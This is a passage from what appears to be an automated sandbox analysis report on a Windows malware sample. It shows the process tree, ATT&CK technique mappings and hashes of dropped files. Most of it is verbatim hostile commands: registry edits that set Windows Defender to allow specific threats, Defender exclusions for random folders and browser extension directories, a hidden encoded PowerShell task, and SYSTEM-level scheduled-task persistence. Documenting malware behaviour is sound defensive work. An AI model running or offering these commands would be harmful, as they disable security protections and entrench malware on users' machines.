ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147841147\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"359386\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"359386\" /t REG_SZ /d 6 /reg:64;"
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:4204
- - C:\Windows\SysWOW64\cmd.exe
    "C:\Windows\system32\cmd.exe" /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:32
    3⤵
    - System Location Discovery: System Language Discovery
    - Suspicious use of WriteProcessMemory
    PID:716
  - - C:\Windows\SysWOW64\reg.exe
      REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:32
      4⤵
      System Location Discovery: System Language Discovery
      PID:2792
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:64
    3⤵
    PID:2704
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 256596 /t REG_SZ /d 6 /reg:32
    3⤵
    - System Location Discovery: System Language Discovery
    PID:1464
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 256596 /t REG_SZ /d 6 /reg:64
    3⤵
    - System Location Discovery: System Language Discovery
    PID:4772
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 242872 /t REG_SZ /d 6 /reg:32
    3⤵
    PID:4464
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 242872 /t REG_SZ /d 6 /reg:64
    3⤵
    - System Location Discovery: System Language Discovery
    PID:2568
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749373 /t REG_SZ /d 6 /reg:32
    3⤵
    - System Location Discovery: System Language Discovery
    PID:5080
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749373 /t REG_SZ /d 6 /reg:64
    3⤵
    - System Location Discovery: System Language Discovery
    PID:1884
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147807942 /t REG_SZ /d 6 /reg:32
    3⤵
    - System Location Discovery: System Language Discovery
    PID:1824
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147807942 /t REG_SZ /d 6 /reg:64
    3⤵
    PID:4224
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735735 /t REG_SZ /d 6 /reg:32
    3⤵
    PID:908
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735735 /t REG_SZ /d 6 /reg:64
    3⤵
    - System Location Discovery: System Language Discovery
    PID:3040
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737010 /t REG_SZ /d 6 /reg:32
    3⤵
    - System Location Discovery: System Language Discovery
    PID:5012
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737010 /t REG_SZ /d 6 /reg:64
    3⤵
    PID:4460
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737007 /t REG_SZ /d 6 /reg:32
    3⤵
    PID:2840
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737007 /t REG_SZ /d 6 /reg:64
    3⤵
    - System Location Discovery: System Language Discovery
    PID:60
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737503 /t REG_SZ /d 6 /reg:32
    3⤵
    PID:4888
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737503 /t REG_SZ /d 6 /reg:64
    3⤵
    - System Location Discovery: System Language Discovery
    PID:1380
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6 /reg:32
    3⤵
    - System Location Discovery: System Language Discovery
    PID:1688
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6 /reg:64
    3⤵
    PID:2292
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749376 /t REG_SZ /d 6 /reg:32
    3⤵
    PID:1612
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749376 /t REG_SZ /d 6 /reg:64
    3⤵
    - System Location Discovery: System Language Discovery
    PID:4780
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737394 /t REG_SZ /d 6 /reg:32
    3⤵
    - System Location Discovery: System Language Discovery
    PID:2132
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737394 /t REG_SZ /d 6 /reg:64
    3⤵
    PID:4528
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147841147 /t REG_SZ /d 6 /reg:32
    3⤵
    - System Location Discovery: System Language Discovery
    PID:2492
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147841147 /t REG_SZ /d 6 /reg:64
    3⤵
    - System Location Discovery: System Language Discovery
    PID:4692
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 359386 /t REG_SZ /d 6 /reg:32
    3⤵
    - System Location Discovery: System Language Discovery
    PID:2428
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 359386 /t REG_SZ /d 6 /reg:64
    3⤵
    - System Location Discovery: System Language Discovery
    PID:4900
- C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
  powershell "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\OkFXZwGHSaUn\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\OkFXZwGHSaUn\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\PBESNRhdmYKU2\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\PBESNRhdmYKU2\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\RjbCmcSmxXHPWkOYaCR\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\RjbCmcSmxXHPWkOYaCR\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\fJZgEdoSEgzXC\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\fJZgEdoSEgzXC\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\jAmSRiPKU\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\jAmSRiPKU\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\ProgramData\YpcryChfqZNPHIVB\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\ProgramData\YpcryChfqZNPHIVB\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Temp\YaWymqZqwGbwcYnZF\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Temp\YaWymqZqwGbwcYnZF\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Windows\Temp\pqEZrWlsHvsjYwEL\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Windows\Temp\pqEZrWlsHvsjYwEL\" /t REG_DWORD /d 0 /reg:64;"
  2⤵
  - System Location Discovery: System Language Discovery
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:3876
- - C:\Windows\SysWOW64\cmd.exe
    "C:\Windows\system32\cmd.exe" /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\OkFXZwGHSaUn" /t REG_DWORD /d 0 /reg:32
    3⤵
    - System Location Discovery: System Language Discovery
    PID:2776
  - - C:\Windows\SysWOW64\reg.exe
      REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\OkFXZwGHSaUn" /t REG_DWORD /d 0 /reg:32
      4⤵
      PID:2160
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\OkFXZwGHSaUn" /t REG_DWORD /d 0 /reg:64
    3⤵
    PID:4792
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\PBESNRhdmYKU2" /t REG_DWORD /d 0 /reg:32
    3⤵
    PID:4116
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\PBESNRhdmYKU2" /t REG_DWORD /d 0 /reg:64
    3⤵
    - System Location Discovery: System Language Discovery
    PID:1636
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\RjbCmcSmxXHPWkOYaCR" /t REG_DWORD /d 0 /reg:32
    3⤵
    - System Location Discovery: System Language Discovery
    PID:208
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\RjbCmcSmxXHPWkOYaCR" /t REG_DWORD /d 0 /reg:64
    3⤵
    - System Location Discovery: System Language Discovery
    PID:4452
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\fJZgEdoSEgzXC" /t REG_DWORD /d 0 /reg:32
    3⤵
    - System Location Discovery: System Language Discovery
    PID:4868
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\fJZgEdoSEgzXC" /t REG_DWORD /d 0 /reg:64
    3⤵
    - System Location Discovery: System Language Discovery
    PID:4760
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\jAmSRiPKU" /t REG_DWORD /d 0 /reg:32
    3⤵
    - System Location Discovery: System Language Discovery
    PID:3396
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\jAmSRiPKU" /t REG_DWORD /d 0 /reg:64
    3⤵
    - System Location Discovery: System Language Discovery
    PID:1880
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\ProgramData\YpcryChfqZNPHIVB /t REG_DWORD /d 0 /reg:32
    3⤵
    - System Location Discovery: System Language Discovery
    PID:4040
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\ProgramData\YpcryChfqZNPHIVB /t REG_DWORD /d 0 /reg:64
    3⤵
    - System Location Discovery: System Language Discovery
    PID:4376
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:32
    3⤵
    PID:4240
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:64
    3⤵
    - System Location Discovery: System Language Discovery
    PID:1828
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:32
    3⤵
    - System Location Discovery: System Language Discovery
    PID:4028
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:64
    3⤵
    - System Location Discovery: System Language Discovery
    PID:512
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Users\Admin\AppData\Local\Temp\YaWymqZqwGbwcYnZF /t REG_DWORD /d 0 /reg:32
    3⤵
    - System Location Discovery: System Language Discovery
    PID:3476
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Users\Admin\AppData\Local\Temp\YaWymqZqwGbwcYnZF /t REG_DWORD /d 0 /reg:64
    3⤵
    PID:4832
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Windows\Temp\pqEZrWlsHvsjYwEL /t REG_DWORD /d 0 /reg:32
    3⤵
    PID:2388
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Windows\Temp\pqEZrWlsHvsjYwEL /t REG_DWORD /d 0 /reg:64
    3⤵
    - System Location Discovery: System Language Discovery
    PID:4216
- C:\Windows\SysWOW64\schtasks.exe
  schtasks /CREATE /TN "gXEayGZYk" /SC once /ST 02:50:45 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="
  2⤵
  - Scheduled Task/Job: Scheduled Task
  PID:4016
- C:\Windows\SysWOW64\schtasks.exe
  schtasks /run /I /tn "gXEayGZYk"
  2⤵
  - System Location Discovery: System Language Discovery
  PID:1820
- C:\Windows\SysWOW64\schtasks.exe
  schtasks /DELETE /F /TN "gXEayGZYk"
  2⤵
  PID:3684
- C:\Windows\SysWOW64\schtasks.exe
  schtasks /END /TN "QktyAJLtVnYfSxJhB"
  2⤵
  - System Location Discovery: System Language Discovery
  PID:768
- C:\Windows\SysWOW64\schtasks.exe
  schtasks /DELETE /F /TN "QktyAJLtVnYfSxJhB"
  2⤵
  - System Location Discovery: System Language Discovery
  PID:4780
- C:\Windows\SysWOW64\schtasks.exe
  schtasks /END /TN "QktyAJLtVnYfSxJhB2"
  2⤵
  PID:2492
- C:\Windows\SysWOW64\schtasks.exe
  schtasks /DELETE /F /TN "QktyAJLtVnYfSxJhB2"
  2⤵
  - System Location Discovery: System Language Discovery
  PID:4900
- C:\Windows\SysWOW64\schtasks.exe
  schtasks /END /TN "UcvpdSaxZqteAEHLP"
  2⤵
  PID:1176
- C:\Windows\SysWOW64\schtasks.exe
  schtasks /DELETE /F /TN "UcvpdSaxZqteAEHLP"
  2⤵
  PID:2928
- C:\Windows\SysWOW64\schtasks.exe
  schtasks /END /TN "UcvpdSaxZqteAEHLP2"
  2⤵
  PID:2288
- C:\Windows\SysWOW64\schtasks.exe
  schtasks /DELETE /F /TN "UcvpdSaxZqteAEHLP2"
  2⤵
  PID:3892
- C:\Windows\SysWOW64\schtasks.exe
  schtasks /END /TN "UNaLOeXwuufOskHYRqU"
  2⤵
  PID:4276
- C:\Windows\SysWOW64\schtasks.exe
  schtasks /DELETE /F /TN "UNaLOeXwuufOskHYRqU"
  2⤵
  - System Location Discovery: System Language Discovery
  PID:4852
- C:\Windows\SysWOW64\schtasks.exe
  schtasks /END /TN "UNaLOeXwuufOskHYRqU2"
  2⤵
  PID:2852
- C:\Windows\SysWOW64\schtasks.exe
  schtasks /DELETE /F /TN "UNaLOeXwuufOskHYRqU2"
  2⤵
  PID:4400
- C:\Windows\SysWOW64\schtasks.exe
  schtasks /END /TN "wMgwruRDwNqKnANvEdh"
  2⤵
  PID:1760
- C:\Windows\SysWOW64\schtasks.exe
  schtasks /DELETE /F /TN "wMgwruRDwNqKnANvEdh"
  2⤵
  - System Location Discovery: System Language Discovery
  PID:3488
- C:\Windows\SysWOW64\schtasks.exe
  schtasks /END /TN "wMgwruRDwNqKnANvEdh2"
  2⤵
  PID:772
- C:\Windows\SysWOW64\schtasks.exe
  schtasks /DELETE /F /TN "wMgwruRDwNqKnANvEdh2"
  2⤵
  - System Location Discovery: System Language Discovery
  PID:4916
- C:\Windows\SysWOW64\schtasks.exe
  schtasks /CREATE /TR "rundll32 \"C:\Program Files (x86)\jAmSRiPKU\ZiFHcX.dll\",#1" /RU "SYSTEM" /SC ONLOGON /TN "HxvKEihgfuYdkMf" /V1 /F
  2⤵
  - Drops file in Windows directory
  - System Location Discovery: System Language Discovery
  - Scheduled Task/Job: Scheduled Task
  PID:2368
- C:\Windows\SysWOW64\schtasks.exe
  schtasks /END /TN "uRXuSJQXCpgnIZA"
  2⤵
  - System Location Discovery: System Language Discovery
  PID:4720
- C:\Windows\SysWOW64\schtasks.exe
  schtasks /DELETE /F /TN "uRXuSJQXCpgnIZA"
  2⤵
  - System Location Discovery: System Language Discovery
  PID:3632
- C:\Windows\SysWOW64\schtasks.exe
  schtasks /END /TN "uRXuSJQXCpgnIZA2"
  2⤵
  - System Location Discovery: System Language Discovery
  PID:2076
- C:\Windows\SysWOW64\schtasks.exe
  schtasks /DELETE /F /TN "uRXuSJQXCpgnIZA2"
  2⤵
  - System Location Discovery: System Language Discovery
  PID:4608
- C:\Windows\SysWOW64\schtasks.exe
  schtasks /END /TN "WvtRwCkDwELrRc"
  2⤵
  PID:2984
- C:\Windows\SysWOW64\schtasks.exe
  schtasks /DELETE /F /TN "WvtRwCkDwELrRc"
  2⤵
  PID:2308
- C:\Windows\SysWOW64\schtasks.exe
  schtasks /END /TN "zgNliGDdKMNiC"
  2⤵
  PID:736
- C:\Windows\SysWOW64\schtasks.exe
  schtasks /DELETE /F /TN "zgNliGDdKMNiC"
  2⤵
  - System Location Discovery: System Language Discovery
  PID:2708
- C:\Windows\SysWOW64\schtasks.exe
  schtasks /END /TN "zgNliGDdKMNiC2"
  2⤵
  - System Location Discovery: System Language Discovery
  PID:1232
- C:\Windows\SysWOW64\schtasks.exe
  schtasks /DELETE /F /TN "zgNliGDdKMNiC2"
  2⤵
  - System Location Discovery: System Language Discovery
  PID:3996
- C:\Windows\SysWOW64\schtasks.exe
  schtasks /CREATE /TN "HxvKEihgfuYdkMf2" /F /xml "C:\Program Files (x86)\jAmSRiPKU\MIdCqfX.xml" /RU "SYSTEM"
  2⤵
  - Scheduled Task/Job: Scheduled Task
  PID:1444
- C:\Windows\SysWOW64\schtasks.exe
  schtasks /END /TN "HxvKEihgfuYdkMf"
  2⤵
  PID:2144
- C:\Windows\SysWOW64\schtasks.exe
  schtasks /DELETE /F /TN "HxvKEihgfuYdkMf"
  2⤵
  PID:3628
- C:\Windows\SysWOW64\schtasks.exe
  schtasks /CREATE /TN "zSXJNzYNKIeBJp" /F /xml "C:\Program Files (x86)\PBESNRhdmYKU2\blkhMdE.xml" /RU "SYSTEM"
  2⤵
  - System Location Discovery: System Language Discovery
  - Scheduled Task/Job: Scheduled Task
  PID:4204
- C:\Windows\SysWOW64\schtasks.exe
  schtasks /CREATE /TN "pXVGQcITqaeiH2" /F /xml "C:\ProgramData\YpcryChfqZNPHIVB\FYJdVKO.xml" /RU "SYSTEM"
  2⤵
  - Scheduled Task/Job: Scheduled Task
  PID:1852
- C:\Windows\SysWOW64\schtasks.exe
  schtasks /CREATE /TN "UcvpdSaxZqteAEHLP2" /F /xml "C:\Program Files (x86)\RjbCmcSmxXHPWkOYaCR\RNnwulk.xml" /RU "SYSTEM"
  2⤵
  - System Location Discovery: System Language Discovery
  - Scheduled Task/Job: Scheduled Task
  PID:3556
- C:\Windows\SysWOW64\schtasks.exe
  schtasks /CREATE /TN "wMgwruRDwNqKnANvEdh2" /F /xml "C:\Program Files (x86)\fJZgEdoSEgzXC\AaKfJcZ.xml" /RU "SYSTEM"
  2⤵
  - System Location Discovery: System Language Discovery
  - Scheduled Task/Job: Scheduled Task
  PID:4000
- C:\Windows\SysWOW64\WerFault.exe
  C:\Windows\SysWOW64\WerFault.exe -u -p 3624 -s 628
  2⤵
  - Program crash
  PID:3876

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==
1⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3920
- C:\Windows\system32\gpupdate.exe
  "C:\Windows\system32\gpupdate.exe" /force
  2⤵
  PID:3164

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s fhsvc
1⤵
PID:5084

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -s WPDBusEnum
1⤵
PID:4744

C:\Windows\system32\gpscript.exe
gpscript.exe /RefreshSystemParam
1⤵
PID:2308

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 440 -p 3624 -ip 3624
1⤵
PID:3436

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Scheduled Task/Job

T1053

Scheduled Task

T1053.005

Persistence

Scheduled Task/Job

T1053

Scheduled Task

T1053.005

Privilege Escalation

Scheduled Task/Job

T1053

Scheduled Task

T1053.005

Defense Evasion

Indirect Command Execution

T1202

Credential Access

Unsecured Credentials

T1552

Credentials In Files

T1552.001

Discovery

Browser Information Discovery

T1217

Query Registry

T1012

System Information Discovery

T1082

System Location Discovery

T1614

System Language Discovery

T1614.001

Lateral Movement

Collection

Data from Local System

T1005

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Program Files (x86)\PBESNRhdmYKU2\blkhMdE.xml

Filesize
2KB

MD5
9b8aa39948b5d6e3343508f1d39a161c

SHA1
858c3a8767973433d4182d97caeabb55ba13be99

SHA256
b6be10303b4aea5bc8dcd998c5e7a087d4eb600b80b35ab9407d4907c613de8a

SHA512
ff26598e696e3ba07eaeaf869eff397ba823ff61e60e66d46158d5e51e80605cd0d53e393eb5da239ac4835a3004a8063705db1f5d4652fadac9ac1b2c2aa2e6

Download Submit
C:\Program Files (x86)\RjbCmcSmxXHPWkOYaCR\RNnwulk.xml

Filesize
2KB

MD5
